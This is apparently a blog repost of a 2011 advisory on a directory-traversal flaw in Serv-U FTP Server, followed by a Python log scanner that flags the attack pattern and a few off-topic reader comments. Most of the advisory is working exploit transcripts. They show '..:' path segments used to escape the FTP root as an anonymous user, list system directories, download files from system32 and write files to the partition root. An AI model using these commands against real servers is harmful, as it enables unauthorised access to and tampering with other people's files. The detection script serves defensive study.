Serv-U FTP Jail Break (unauthorized directory traversal and arbitrary file download)

Whether or not you understood it, I certainly didn't. Foreign languages are too much for me.

I'm better than TESO!
CONFIDENTIAL SOURCE MATERIALS!
----------------------------------------------------
    Serv-U FTP Server Jail Break 0day
    Discovered By Kingcope
    Year 2011
----------------------------------------------------

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...
----------------------------------------------------

C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp                              (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r--   1 user     group           0 Nov 12 21:48 .
dr--r--r--   1 user     group           0 Nov 12 21:48 ..
drw-rw-rw-   1 user     group           0 Feb 14  2011 Apache Software Foundation
drw-rw-rw-   1 user     group           0 Feb  5  2011 ComPlus Applications
drw-rw-rw-   1 user     group           0 Jul 11 01:06 Common Files
drw-rw-rw-   1 user     group           0 Jul  8 16:57 CoreFTPServer
drw-rw-rw-   1 user     group           0 Jul 11 01:06 IIS Resources
d---------   1 user     group           0 Jul  8 16:12 InstallShield Installation Information
drw-rw-rw-   1 user     group           0 Jul 29 15:07 Internet Explorer
drw-rw-rw-   1 user     group           0 Jul  8 16:12 Ipswitch
drw-rw-rw-   1 user     group           0 Feb 12  2011 Java
drw-rw-rw-   1 user     group           0 Jul 26 13:19 NetMeeting
drw-rw-rw-   1 user     group           0 Jul 29 14:39 Outlook Express
drw-rw-rw-   1 user     group           0 Jul  8 15:39 PostgreSQL
drw-rw-rw-   1 user     group           0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw-   1 user     group           0 Feb 12  2011 Sun
d---------   1 user     group           0 Jul 29 15:13 Uninstall Information
drw-rw-rw-   1 user     group           0 Feb  5  2011 VMware
drw-rw-rw-   1 user     group           0 Jul  8 15:34 WinRAR
drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player
drw-rw-rw-   1 user     group           0 Feb  5  2011 Windows NT
d---------   1 user     group           0 Feb  5  2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
----------------------------------------------------

with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
----------------------------------------------------
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
----------------------------------------------------


This works too!!! :

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..::....:..:..:..:..:..:..:*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
----------------------------------------------------

Sometimes you need to give it the path:

ftp> ls "-a ..::....:..:..:..:..:..:..:program files"
ftp> ls "-a ..::....:..:..:..:..:..:..:program files*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

======================================================================

fr0m:A8
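
A defensive check for the pattern in the transcript above, added here as an example (it is not part of the original advisory or of Serv-U): it scans FTP command logs for path arguments containing the `..:` segment and records whether the server accepted them. The log line format, the session ids and `secret.txt` are constructed for illustration.

```python
import re

# FTP commands whose argument is resolved as a path on the server.
PATH_COMMANDS = {"CWD", "RETR", "STOR", "APPE", "LIST", "NLST",
                 "SIZE", "MDTM", "DELE", "MKD", "RMD"}
# "..:" is the decorated parent-directory segment seen in the transcript.
DOTDOT_COLON = re.compile(r"\.\.:")
# Constructed log format (an assumption, not Serv-U's own):
#   "[session] > COMMAND argument" (client)  /  "[session] < CODE text" (server)
LINE = re.compile(r"^\[(?P<sid>\d+)\]\s+(?P<dir>[<>])\s+(?P<rest>.*)$")

def scan(lines):
    """Flag path commands containing '..:' and pair each with its first reply."""
    findings, pending = [], {}
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        sid, rest = m["sid"], m["rest"]
        if m["dir"] == ">":
            pending.pop(sid, None)  # a new command ends any wait for a reply
            verb, _, arg = rest.partition(" ")
            if verb.upper() in PATH_COMMANDS and DOTDOT_COLON.search(arg):
                hit = {"session": sid, "command": verb.upper(),
                       "argument": arg, "reply": None, "accepted": False}
                findings.append(hit)
                pending[sid] = hit
        elif sid in pending and rest[:3].isdigit():
            hit = pending.pop(sid)
            hit["reply"] = int(rest[:3])
            # 1xx/2xx/3xx replies mean the server did not reject the path.
            hit["accepted"] = rest[0] in "123"
    return findings

# Constructed sample log; the paths reuse strings shown in the transcript.
SAMPLE_LOG = [
    "[1] > CWD ..",
    "[1] < 250 Directory changed to /",
    "[1] > CWD /..:/..:/..:/..:/program files",
    "[1] < 250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files",
    "[2] > RETR ..:/..:/..:/..:/windows/system32/calc.exe",
    "[2] < 150 Opening ASCII mode data connection for calc.exe (115712 Bytes).",
    "[3] > RETR ..:/..:/secret.txt",
    "[3] < 550 Permission denied.",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ACCEPTED" if hit["accepted"] else "rejected", hit["command"], repr(hit["argument"]))
```

An accepted hit corresponds to the behaviour shown in the transcript; a rejected one is still worth reviewing as a probe against a server that handles the segment correctly.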

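20 comments on "Serv-U FTP Jail Break (unauthorized directory traversal and arbitrary file download)"

  1. 大盘预测 said:

    Nice!! I'd like to know the name of the music on the homepage!! It sounds great, I like the style!!

  2. ′ s7ool 、 said:

    @扑克分析仪: This needs further investigation!

  3. 扑克分析仪 said:

    Is this the legendary tree traversal?

  4. ′ s7ool 、 said:

    @无锡seo: I didn't understand it either!

  5. ′ s7ool 、 said:

    @杨大叔: I didn't understand it either!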
